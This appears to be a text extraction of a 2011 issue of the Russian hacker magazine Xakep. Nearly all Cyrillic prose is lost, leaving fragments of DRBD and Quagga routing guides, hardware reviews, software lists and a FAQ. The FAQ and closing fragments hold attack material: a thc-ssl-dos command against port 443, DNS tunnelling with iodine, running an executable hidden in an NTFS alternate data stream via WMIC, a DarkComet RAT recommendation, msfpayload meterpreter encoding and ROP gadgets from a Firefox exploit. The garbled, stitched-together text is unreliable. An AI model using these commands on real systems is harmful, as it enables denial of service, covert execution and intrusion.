). :

. ,
,
!
. 2009
Linux DRBD (Distributed
Replicated Block Device),
, , ,
-, , .
,
Linux.
128
, :
1. . ,
.
fdisk/cfdisk GNU Parted. ,
, , .
, ,
: sda5 192.168.0.1 sda7 192.168.0.2.
, ,
. DRDB ,

, master-.
, master- ,
.
2. ,
. ,
: shared-secret
, disk
, address .
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
cram-hmac-alg sha1;
shared-secret "";
}
on node1 {
device /dev/drbd0;
disk /dev/sda5;
address 192.168.0.1:7788;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sda7;
address 192.168.0.2:7788;
meta-disk internal;
}
}

DRBD-.
drbd-utils drbd8-utils.
3.
drbdadm:
# drbdadm create-md drbd0
.
DRBD-:
# /etc/init.d/drbd start
12 /155/ 2011
DRBD-
(,
drbdadm up all),
DRBD master-, ,
.
/etc/gg.exports -
, :
4. master- DRBD, :
, ,
- ggate, :
192.168.0.2 RW /dev/ad0s1d
# drbdadm primary all

# ggated
.
/proc/drbd.
5. .
DRBD- :
# mkfs.ext4 /dev/drbd0
# mount /dev/drbd0 /mnt
, /mnt,
.
, master- . ,
.
FreeBSD .
GEOM- ggate, , GEOM- gmirror
RAID1.
, DRBD Linux.
, ,
.
DRBD, . , .
GEOM-:
# kldload geom_mirror
# kldload geom_gate
, ggate
, .
12 /155/ 2011
-
:
# ggatec create 192.168.100.2 /dev/ad0s1d
, ( ,
ggate0). ,
- ( /dev/ad0s1d) /dev/ggate0
RAID1- gmirror:
# gmirror label -v -b prefer gm0 ggate0 ad0s1d
, .
, : ) , )
prefer .
/ :
# fsck -t ufs /dev/mirror/gm0
# mount /dev/mirror/gm0 /mnt
,
UNIX-,
man-. ,
! z
129
SYN/ACK
SYN/ACK
grinder
grinder (grinder@tux.in.ua)

,

.

.

,

.
.
130
0130
VIDEO
BIRD
bird.network.cz.
C Quagga quagga.net.
Quagga quagga.
net/docs.
RFC
ietf.org.
WARNING

Quagga

CONFIG_NETLINK,
CONFIG_RTNETLINK
CONFIG_IP_MULTICAST.
INFO
Quagga
.
,
,

.
/usr/
share/doc/quagga/
tools
LINUX

: ,
() ?
?
? , -.
,
cron IP .
c .
iproute2. , , ,
( 192.168.0.2 192.168.1.2 ,
192.168.0.1 192.168.1.1 ):
#echo "1_ISP" >> /etc/iproute2/rt_tables
#echo "2_ISP" >> /etc/iproute2/rt_tables
#ip route add 192.168.1.0/24 dev eth0 src \
192.168.1.2 table 1_ISP
#ip route add default via 192.168.1.1 table 1_ISP
#ip route add 192.168.0.0/24 dev eth2 src 192.168.0.2 \
table 2_ISP
#ip route add default via 192.168.0.1 table 2_ISP
#ip rule add from 192.168.1.2 table 1_ISP
#ip rule add from 192.168.0.2 table 2_ISP
#ip route add default scope global nexthop via \
192.168.1.1 dev eth0 weight 1 \
nexthop via 192.168.0.1 dev eth2 weight 1
,
. ,
, ,
. :
RIP, OSPF, BGP, IGRP, EIRGP, IS-IS .

, ,
. - , , . :
RIP (Routing Information Protocol) BSD
.

,
.
(, . hope).
30 , .
(next hop)
. RIP . 15.
180 ,
16 . ,
.
RIPv2 (RFC 2453) RIPng ( IPv6). 520/UDP.
12
12 /155/
/155/ 2011
2011
OSPF (Open Shortest Path First) , (link-state technology)

( ).

, . DR (Designated router)
BDR (Backup Designated Router).
.
89/IP. RFC 2328 (
RFC ).
EIGRP (Enhanced Interior Gateway Routing Protocol) IGRP
Cisco. , , . OSPF ,
.
BGP (Border Gateway Protocol, 179/TCP)
(
IS-IS), (AS, Autonomous
System). ,
IP,
.
,
, RIP, OSPF,
BGP. ,
RIP. *nix. .
. , OpenBGPD/OpenOSPFD (openbgpd.org)
BGPv4 OSPF OpenBSD.
3.5/3.7.
, IP-.
debian.conf
. Quagga
,
zebra (core daemon),
,
API.
.

vtysh,
Quagga. vtysh Cisco CLI,
, Cisco, ,
.
Quagga Linux, *BSD OpenSolaris. Ubuntu
:
$ sudo apt-get install quagga
# vi /etc/sysctl.conf
net.inet.ip.forwarding=1
/etc/ospfd.conf
ospf6d.conf, .
*nix ( Linux)
, :
BIRD (BIRD Internet Routing Daemon, bird.network.cz) RIPv2,
BGPv4, OSPFv2/v3,
.
Quagga (quagga.net) , BGPv4 v4+, RIP v1/v2/v3, RIPng, OSPF
v2/v3 IS-IS.
,
.
, .
QUAGGA UBUNTU LINUX

GNU Zebra,
2005 ,
Zebra-pj. Quagga
(Route Reflectors).
BGP,
(speaker) . RR ,
, DR BDR OSPF,
12
12 /155/
/155/ 2011
2011
, . ,
.
/etc/quagga. ,
,
: quagga.net/doc. (
) /etc/quagga/daemons.
. OSPF:
$ sudo nano /etc/quagga/daemons
zebra=yes
ospfd=yes
bgpd=no
# OSPF IPv6
ospf6d=no
ripd=no
# RIPng IPv6
ripngd=no
isisd=no
yes no ,
: 1 ( )10 ( ) 0 ().
TCP-, , /etc/services:
$ grep zebra /etc/services
, Quagga
.
131
0131
SYN\ACK
SYN/ACK
grinder (grinder@tux.in.ua)
,
, terminal mode.
,
/etc/quagga/debian.conf ( /etc/
init.d/quagga), '--keep_kernel'
'--retain'.
$ sudo nano /etc/quagga/debian.conf
vtysh_enable=yes
zebra_options=" --daemon -A 127.0.0.1 -u quagga \
--keep_kernel --retain"
ospfd_options=" --daemon -A 127.0.0.1 -u quagga"
'--daemon'
IP-, (-A 127.0.0.1).
vtysh_enable
. ,
, '-u quagga'.
:
, Quagga
$ grep quagga /etc/passwd

quagga:x:117:128:Quagga routing suite,,,:/var/run/
quagga/:/bin/false
, .

OSPF
/usr/share/doc/quagga/examples
, :
$ sudo cp v /usr/share/doc/quagga/examples/zebra.conf.sample \
/etc/quagga/zebra.conf
$ sudo cp v /usr/share/doc/quagga/examples/ospfd.conf.sample \
/etc/quagga/ospfd.conf
$ sudo cp v /usr/share/doc/quagga/examples/vtysh.conf.sample \
/etc/quagga/vtysh.conf
:
list
$ sudo chown quagga:quagga /etc/quagga/zebra.conf

$ sudo chown quagga:quagga /etc/quagga/ospfd.conf
Quagga.
$ sudo service quagga restart
.....
Starting Quagga daemons (prio:10): zebra ospfd.
enable password pass2

!
interface lo
interface eth0
!
! bandwidth cost
! /
,
. ps aux | grep quagga netstat-ant ,

.
,
. ,
vtysh. !
#. zebra.conf:
multicast
!
! ( )
ip route 0.0.0.0/0 11.22.33.44
! , /var/log/quagga
! / quagga:quagga
$ sudo nano /etc/quagga/zebra.conf

!
hostname Router1
! vty
password pass1
!
ospfd.conf
.
132
0132
log file /var/log/quagga/zebra.log
$ sudo nano /etc/quagga/ospfd.conf

!
router ospf
12
12 /155/
/155/ 2011
2011
! ospf
area 0
network 192.168.0.0/24 area 0
! network 172.10.10.0/16 area 1
log file /var/log/quagga/ospfd.log
. telnet vtysh.
:
$ sudo vtysh
.
, list. :
# configure terminal
.
, ,
,
.
(config)# service password-encryption
(config)# exit
;
# show memory
# write memory
Integrated configuration saved to /etc/quagga/Quagga.conf [OK]
, ,

. Quagga.conf, ,
. show startupconfig . .
# show ip route
Codes: K - kernel route, C - connected, S - static,
R - RIP, O - OSPF, I - ISIS, B - BGP,
> - selected route, * - FIB route
S 0.0.0.0/0 [1/0] via 192.168.10.2, eth0
K>* 0.0.0.0/0 via 192.168.10.2, eth0
C>* 127.0.0.0/8 is directly connected, lo
K>* 169.254.0.0/16 is directly connected, eth0
OSPF
C>* 192.168.0.0/24 is directly connected, eth0
, .
(IP 192.168.1.2):
(config)# ip route 10.0.0.0/8 192.168.1.2
,
OSPF.
, .
(config)# router ospf
; ID , IP
(config-router)# ospf router-id 192.168.0.1
;
(config-router)# redistribute connected
(config-router)# redistribute static
;
(config-router)# neighbor 192.168.1.2
(config-router)# neighbor 192.168.2.2
(config-router)# default-information originate
(config-router)# end
# write file

( ), default-information originate.
, static route, .
.
, router-id neighbor.
.
#
#
#
#
#
show
show
show
show
show
ip ospf database
ip ospf neighbor
ip ospf database
interface
debugging ospf
write memory
12
12 /155/
/155/ 2011
2011
. , ,
, . , . z
133
0133
FERRUM
QUADRATISCH.
PRAKTISCH. GUT

ATX , , ,
, .

. Micro-ATX,
.
Mini-ITX. . , GIGABYTE GA-H61N-USB3.

,
Mini-ITX Intel
H61 Express. -, .
, , PEG ( SLI
CrossFireX ). . ,
DDR3
1333 , !
, . ,
PCI Express 16
, . Intel
P67 Express Intel Z68 Express.
PCI Express, USB 2.0 SATA II.
, USB 3.0 SATA 3.0 .

-
, ,
SATA
Intel H67 Express. ,

. ,
Intel H61 Express RAID'. ,
Intel
. Intel Sandy Bridge

Intel H61 Express DIMM,
SATA II PCI Express x16.
,
. .

PCI Express x16 .
,
, ,
Wi-Fi- -
, . , GIGABYTE GA-H61N-USB3

. ,
, ,
,
, -
.

. , GIGABYTE GA-H61N-USB3
.
HDMI 1.4 , 3D. Intel Sandy Bridge
HD-.
USB- (
USB 3.0), S/PDIF eSATA .
.
SATA-. , SATA II,
SATA 3.0. -, .
134

SSD,
. ,
, . .
, HTPC
SATA II,
23
, Dual BIOS . , GIGABYTE GA-H61N-USB3
,
RAID- .
. ,
.
DIMM, PCI Express x16.
,
BIOS ( Smart 6)
.

,
, , - .
, Super Pi 1.5 XS
,
wPrime 32 ,
Intel Sandy Bridge. WinRAR
CINEBENCH , ,
HD-.
, , Intel H61
Express ,

.
.

,
GIGABYTE GA-H61N-USB3 . ,

, GIGABYTE Super 4 GIGABYTE
Ultra Durable 3. ,
, , :
HTPC. z
12 /155/ 2011
Quadratisch. Praktisch. Gut
3000
.

,
Mini-ITX (170 170 )
.
Nano-ITX (120 x 120 ) PicoITX (100 x 72 ). ,
GIGABYTE GA-H61N-USB3 .
12 /155/ 2011
: LGA1155
: Intel H61 Express
: DDR3, 8001333
: 1x PCI Express x16
: 2x SATA II
: Ethernet, 10/100/1000 /
: 7.1 CH, HDA, Realtek
ALC889
: 1x DVI, 1x
D-Sub, 1x HDMI, 2x USB 3.0, 4x USB 2.0,
1x eSATA, 2x S/PDIF, 1x RJ-45, 3
: Mini-ITX, 171 171
:
Intel Core i5-2400, 3,1
:
: Kingston
KVR1066D3N7K2/2G, 2x 1
SSD: Corsair Force F120,
120
: HIPER TYPE
K1000, 1000
: Windows 7
Super Pi 1.5 XS 1m: 12,276

wPrime 1.55 32m: 10,86 c
CINEBENCH 11.5: 4,12 pts
WinRAR: 2987 /c
135
FERRUM
,

EDIFIER MP250
1300
.
Edifier, ,
.

:
Edifier MP250 . ,
, , .
!

Edifier MP250 ,
. , .
, ,
,

. Edifier MP250
,
.

USB mini-USB, jack-tojack .
.
,

. , Edifier MP250 :
.
:
: RMS 2 2
/: 75
- -: 4 1,25
-: , 3 1,25
: USB, 3,5 jack
: USB,
: 261 36 44
: 0,33
USB-.
. USB.
3,5
. ,
,
USB,
.
,

,
. ,
,
. ,
. ,
.
Edifier MP250
. Edifier MP250 -
,
.
136

. Edifier MP250 .

, .
( , )
.
Edifier MP250

. ,

.
-
,
Edifier MP250. ,
, . ,
? ,

. z
12 /155/ 2011
>Net
BenderConverter
Colasoft Packet Player 1.2
Device Doctor 2.0
digsby
Echo Mirage 1.2
Feed Notifier 2.5
FVD Suite 2.6.8
Google.mE 1.50
inSSIDer 2.0.7
MetroTwit
NetSpeedMonitor 2.5.4.0
NFReader 1.4.1
Odysseus 2.0.0.84
ooVoo 3.0.4
RevoluTV 2.5
>Multimedia
AIMP 3.00 Beta 5
DeepBurner 1.9
DipTrace 2.2
Evernote 4.5.1
Foxit Reader 5.1
GeeTeeDee 0.1.274
GIMPshop 2.2.8
Greenshot 0.8.1
IrfanView 4.30
PicPick 3.0.9
Virtual DJ 7.0.5
Virtual Piano 4.0
WorldWide Telescope 3.0.5.1
Xbmc 10.1
XnConvert 1.10
>Misc
AltDrag 0.9
CollageIt
Desk Drive 1.8.2
DeskView
Dropresize
F.lux
FilerFrog 2.0
FluentNotepad
Q10 1.2.21
RandomScreensaver 2.0.1
Scrybe 1.6.4
TaskDock
Wheel Here 1.4.2
Windows Themes Installer 1.1
YoWindow 2.0
>>WINDOWS
>Development
BinVis
CollabNet Subversion Edge 2.1.1
Crack.NET 1.2
Dependency Walker 2.2
Expresso 3.0
HttpWatch 7.2
Immunity Debugger 1.83
jQueryPad
Parrot 3.9.0
Scapy 2.2.0
SQLiteStudio 2.0.19
VisualSVN Server 2.5
WebStorm 3.0
WinAppDbg 1.4
>Devel
Dojo 1.6.1
Fltk 3.0.x-r9155
Fpdf 1.7
Glade 3.10.2
Gwt 2.4.0
>>UNIX
>Desktop
Audacity 1.3.13-beta
Blender 2.60a
Darktable 0.9.2
Digikam 2.2.0
Dvdstyler 2.0
Gcad3d 1.70
Inscape 0.48.2
Kmplayer 0.11.3a
Luckybackup 0.4.6
Midnight commander 4.8.0
Peazip 4.1
Picasa 3.0
Postr 0.12.4
Seahorse 2.28.1
Soundkonverter 1.2.0
Sox 14.3.2
Xneur 0.14.0
Zim 0.53
>System
Chameleon Shutdown 1.1.1.30
Disk Space Fan
Drive Backup 0.0604
HD Speed 1.7.1.90
IObit Toolbox 1.2
LockNote 1.0.5
MenuMaid 1.0.1
MonitorES 1.0.1
NirLauncher
QRM Plus Manager 1.0
RecycleBinEx 1.0.5.530
Soluto
Switcher 2.0.0
SystemMonitor 1.64
WinBubble 2.0
WindowMenuPlus 1.14
Sql-Injection:
MySqloit 0.1
SQID 0.3
SQL Power Injector 1.2
Sqlbftools 1.2
SQLBrute
Sqlmap 0.9
SQLNinja 0.2.6
>Security
AppAdmin 1.1.0
BeEF 0.4.2.10
Free File Wiper 0.7d
Freeraser 1.0.0.23
Secret Disk 1.35
Telemachus 1.0
Tor 0.2.2.34
USB Port Locked 2.0
Volatility 2.0
WinLockr
WipeFile 2.1.1
>Server
Apache 2.2.21
Asterisk 1.6.2.20
>Security
Clamav 0.97.3
Ctunnel 0.6
Gnutls 3.0.5
Nikto 2.1.4
Pac 3.3.5
Passwordsafe 0.6.0beta
Pdfcrack 0.11
Saferhoneypot 20111027
Slackfire 0.65.e
Snare 2.0.0
ARMu 0.17b
DOM Snitch v0.725
ExaScan
Exploit Pack
findmyhash 1.1.2
hash-identifier 1.1
Hatkit Proxy 0.5.1
L0phtCrack v6.0.12c
Ostinato v0.5
PacketFence 3.0.2
Watcher 1.5.4
WiFuzz
xSQLScanner 1.2
>Net
Amule 2.3.1rc2
Bareftp 0.3.9
Bitlbee 3.0.3
Blam 1.8.7
Chrome 13.0.782
Drivel 3.0.3
Fatrat 1.1.3
Gnugk 2.3.5
Ifolder 3.8.0.3
Opera 11.52
Peerguardian 2.1.3
Qbittorrent 2.9.2
Qwit 1.1-pre2
Remmina 0.9.3
Skype 2.2.0.35
Smb4k 0.10.90
Sylpheed 3.1.2
Uget 1.8.0
>Games
Rigsofrods 0.38.64
Sauerbraten 20100728
Simutrans 110.0.1
Jfreechart 1.0.17
Jqueryui 1.8.16
Juce 1.53
Lazarus 0.9.30.2rc2
Libsdl-android
Matplotlib 1.1.0
Movicon 1.0b
Poedit 1.4.6.1
Scintilla 2.29
Symfony 2.0.4
Tcpdf 5.9.134
Ultimatepp 3211
Wxwidgets 2.9.2
>>MAC
0xED 1.0.9
Bean 2.9.7
DragonDisk 0.92
Eddie 2.1
Firefox 8.0
ImageBurner 2.0
KeyCue 6.0
Letterbox 0.24b9
LiteSpeed Web Server 4.1.7
Opera 11.52
OS Track
Palringo 4.0.1
Punto Switcher 3.2.5
Que 1.3.1
Raven 0.6
TeamViewer 6.0.10548
Tunatic 1.1
uTorrent 1.5.11
VirtualBox 4.1.4
>X-distr
Fedora 16 Desktop Edition
Puppy 5.3
Slce 6.1
Ubuntu 11.10
>System
2clickupdate 6.0
Ajenti 0.6.0
Bluez 4.96
Checkinstall 1.6.2
Collectl 3.6.0
Cryptmount 4.2.1
Fslint 2.42
Grub 1.99
Kml 3.1_001
Nilfs-utils 2.1.0-rc2
Robinhood 2.3.2
Smartmontools 5.42
Squashfs 4.2
Sysstat 10.0.2
Testdisk 6.12
Bind 9.8.1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.15
Freeradius 2.1.12
Lighttpd 1.4.29
Minidlna 1.0.22
Mysql 5.5.17
Nsd 3.2.8
Openldap 2.4.26
Openvpn 2.2.1
Postfix 2.8.6
Postgresql 9.1.1
Samba 3.6.1
Sendmail 8.14.5
Snort 2.9.1.2
Squid 3.1.16
Syslog-ng 3.3.1
Vsftpd 2.3.4
12(155) 2011

i)0V
.!4
plmazh
pq_lc_oqimcglb_

_q_igl_
nmj{fma_qdjdh
vdodfo_pwgodlg~
&)2%&/8

glqdoa{}p
pmfc_qdjdk
.').8

odimkdlcma_ll_~

-'*5.11)1*/'0

8889",&136

!
800
!
191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .
8.5
DVD
!
!
,
, :

+ DVD
Total Football
+ DVD
DVD
+ DVD
DVDXpert
+ DVD
Smoke

,

.
PC
+ 2 DVD
+ DVD
T3
Digital Photo
+ DVD
+ DVD
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
UNITS / FAQ UNITED
ant
FAQ United

FAQ@REAL.XAKEP.RU

ANDROID, .
- ,

?

,

.
- ,
.
Honeynet Project A.R.E (Android Reverse Engineering)

Android.

: Androguard,
Android sdk/ndk, APKInspector, Apktool,
A xmlprinter, Ded, Dex2jar, DroidBox, Jad,
Smali/Baksmali
.
A.R.E
redmine.
honeynet.org/projects/are/wiki.
,

,
HIGHLOAD?
,
,
-,
, ,
,
.
.
The Hackers Choice DDoS, SSL-.
thc-ssl-dos ,
SSL-
15 , .
SSL. ,

2003 ! -
:
$ ./thc-ssl-dos <IP- > 443
-

FACEBOOK?

fbpwn (code.google.com/p/fbpwn).
,

, -
.
,
,
.
,
- ,
,
.

, DNS-
.
DNS-
?
! DNS-
.
DNS.

,
DNS-. :
,
- .
DNS, iodine (code.
kryo.se/iodine).
-
iodined:
$ iodined -f -m 220 -l 1.2.3.4 -P 123

192.168.0.1 ns.abc.ru
5 : WINDOWS-

Windows-
,
.
, ,
. ,
-
.
140
,

.
Loggly (loggly.
com).
: syslog/syslog-ng
API.
Windows
syslog. ,
. ,

, ,

API loggly.
12 /155/ 2011
FAQ UNITED
:
f , ;
m mtu
MTU ( DNS-);
l IP
IP, ( ,
DNS-,
);
P .

-

NTFS?
,

ADS.
C:\temp>dir /r C:\temp
Directory of C:\temp
.
..
5 NUL
1 File(s)
5 bytes
,
,
iodine:
C:\temp>streams C:\temp
Streams v1.56 - Enumerate alternate
(C) 1999-2007 Mark Russinovich
NTFS data streams
No files with streams found.

.

,
- (CON,
PRN, AUX, NUL, COM1, LPT1 ..),

dir /R
streams.exe .
, ,
\\?\ . ,
ADS:
$ iodine -P 123 ns.abc.ru

,
,
DNS-.
DNS-, ,
.
,
Q

,

. . . -
.

?
.
.
,
WMIC:
C:\temp>wmic process call create
\\?\C:\temp\NUL:hidden_ADS.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1620;
ReturnValue = 0;
};
:\temp>type C:\Windows\System32\
cmd.exe > \\?\C:\temp\NUL:hidden_
ADS.exe
:
,

,
.

:
<FilesMatch "\.(gif|jpe?g)$">
SetEnvIf Referer "^http://
([^/]*\.)?mydomain.com/" request_ok = 1
Order Allow, Deny
Allow from env=request_ok
</FilesMatch>

(GIF JPG)
, (mydomain.com). ,
NTsyslog (troy.jdmz.net/syslogwin)
,
, Windows

syslog-. ,
, syslog-.
12 /155/ 2011
,
, .

Windows-
Snare (www.intersectalliance.
com).

, , . Windows
Snare Agent.
-
Loggly .
. Graylog2 (graylog2.org)
syslog- , -
.
141
UNITS / FAQ UNITED
Apache'
.htaccess.
.

,
(2 ).

.
,
. ?
, , ,
. . . P2P, . -,
.
torrent- ( ).
, ,
, -,

.
Torrent2exe.com
.torrent
. DriverPack Solution 11 (drp.su/ru),

Torrent2exe. : 3 .
ant
(
cp1251,
, )
(
latin1).
. Sypex Dumper
(sypex.net).
, auto.

. ,
, cp1251,
. !
,
,
UTF-8.
UTF-8,
, . ,
UTF-8, UTF-8,
latin1.
MySQL
UTF-8,
latin1, MySQL latin1 UTF-8.

SSH-,
LINUX-?

SLIDESHARE,
. ?
,
, iptables.
, :

A ,
.
,
bash-,
-.
GitHub' (https://
gist.github.com/1129974).
iptables -P INPUT DROP

.
.

. ?
iptables -A INPUT -p tcp -m tcp \

--dport 22 -m state --state NEW \
-m recent --update --seconds 60 \
--hitcount 4 --rttl --name SSH \
-j DROP
,
cp1251,
latin1. . :

-j ACCEPT
.
-
,
?
, ,
TeamViewer Chrome Remote Desktop,
Google.
DarkCometRAT (www.darkcomet-rat.com),

, -
.

, DarkComet-RAT .
,
SOCKS5,

.
:).

TOR.
(
-- ),

.

,

SOCKS, Tor-.
Torsocks (code.google.
com/p/torsocks):
$ usewithtor [application]

MySQL 4.1 ;
,
,
,
, ;
142
iptables -A INPUT -m state --state \

ESTABLISHED,RELATED -j ACCEPT
-m recent --set --name SSH

,
/proc/net/ipt_recent/SSH.

.
, -
application ,
Tor.
. , ssh
some.ssh.com, Tor:
$ usewithtor ssh username @ some.ssh.com
,
.
SWF-, ,

.
as3-proxy
(github.com/alun/as3-proxy).
-
Apparat (code.google.com/p/apparat)

.

,
. z
12 /155/ 2011
UNITS /
+ Bluetooth=
SMS
.
SMS .
, .
1
2

. Bluetooth,

(pairing)
.
,
.
2

AT-,
SMS-
.
,
Bluetooth-.
3

.
,

.
144
4
, ,
TeamViewer.
.
.
.
11 /154/ 2011
>> coding

Хакер 2011 12 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 12 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

030

LFI /TMP/ PHPINFO()

Quadratisch. Praktisch. Gut

GOOGLE : Google Buzz, Google Labs, Google Code Search Jaiku.

WEXLER.BOOK E6002. WEXLER

BUFFALO MINISTATION PLUS

Buffalo MiniStation Plus

THE WALL STREET JOURNAL, Photobucket .

9TO5MAC , IPAD 2 Smart Cover.

EUROPEAN ATM SECURITY TEAM , , , 33 %.

PARKER 5TH TECHNOLOGY

MS Windows 0-Day, Duqu TrueType. T2EMBED.DLL bit.ly/sqYUgo

, ... , StuxNet 0-day

Access Data FTK Imager

000, 00spersky Lab

: _GET, _POST _FILES. PHP (<=5.1) phpinfo()

URL POST- , PHP-

$tmp = str_replace(array("=&gt;",' '), '', $r[0][2]);

$html phpinfo, $tmp

git merge experimentalBrunch

git branch experimentalBrunch

git log / gitk

git checkout experimentalBrunch

, branch , : git checkout

Adobe JavaScript-, iframe.

Wired Gizmodo , Flash .

NAT'. gogoCLIENT NAT Traversal,

Teredo. IPv6- IPv4

GreenDog , Digital Security (twitter.com/antyurin)

HTTPS. manin-the-middle SSL-,

2. Redirect c HTTPS HTTP. sslstrip.

meterpreter Metasploit (www.metasploit.

XOR rocks! Avast

#msfpayload windows/meterpreter/bind_tcp R | msfencode \

( EasyHack - ? :)). buf

WEXLER.HOME 903 Windows 7 .

Intel Core i5-650 3,2 - 4 . CPU

GeForce GTX 460,

400 Bad Request.

Apache HTTP Server 1.3.x 1.3.42;

./xchmod [///] ( - /etc/shadow)

Xorg 1.4 1.11.2.

Xorg 1.11.2 1.12 .

ACDSee FotoSlate 4.0. Access Violation.

spray() heap spraying ASLR. DEP ROP-:

Firefox 3.6.16. (generic/debug_trap)

jsarray.cpp 2767. JavaScript- reduceRight,

MOV ESI,DWORD PTR DS:[EAX]

POP EBP ; xul.1003876B

POP ECX ; xul.104C26F0

POP EDI ; xul.102AC001

POP EAX ; <&KERNEL32.VirtualAlloc>

MOV EDI,EDI ; xul.102AC001

JMP ESP ; payload

uripath => test

[*] Using URL: http://0.0.0.0:8080/test

ACDSee FotoSlate 4.0 Build 146.

Mozilla Firefox 3.6.16, 3.6.17.

<b lol="yeah"> </b>

Visa, MasterCard, ACH,

Visa, MasterCard, ACH,

Visa, EuroDebit, ACH, Wire

$tmp = str_replace(array("=>",' '), '', $r[0][2]);